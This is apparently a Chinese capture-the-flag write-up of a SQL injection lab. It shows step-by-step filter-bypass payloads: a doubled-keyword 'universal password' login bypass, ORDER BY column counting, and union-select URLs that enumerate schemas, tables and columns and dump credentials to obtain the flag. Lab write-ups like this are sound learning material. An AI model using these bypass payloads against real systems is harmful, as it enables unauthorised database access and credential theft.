SQL注入靶场演练


找闭合,用万能密码,发现过滤or,所以绕过admin’oORr‘1‘=’1

发现登陆成功

尝试用order by查询列数,又发现by过滤,所以绕过admin’/**/oorrder/**/bBYy/**/3查出列数是3

用联合查询,发现过滤http://139.196.211.199:8162/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,3 %23&password=admin发现2和3是回显点

继续用联合查询查询库名,发现过滤

fromhttp://139.196.211.199:8139/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(schema_name)/**/ffromrom/**/infoorrmation_schema.schemata %23&password=admin结果显示:

查到库名,发现有geek库,果断继续查询表名(仍然注意过滤,发现where也被过滤)

http://139.196.211.199:8162/check.php?username=-

admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(table_name)/**/ffromrom/**/infoORrmation_schema.tables/**/whwhereere/**/table_schema=’geek’%23&password=admin

结果显示: 查字段

-admin%27/**/ununionion/**/seselectlect/**/1,2, group_concat(column_name)/**/frofromm/**/infoorrmation_schema.columns/**/whwhereere/**/table_name=%27ssql%27%23&password=admin

最后一步查表中数据

http://139.196.211.199:8162/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(‘id’,’username’,'passwoorrd')/**/ffromrom/**/ssql%23&password=admin(一开始尝试在geekuser里面查找flag,但查询时发现没有查想要的数据,所以将geekuser改为ssql后查到flag)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值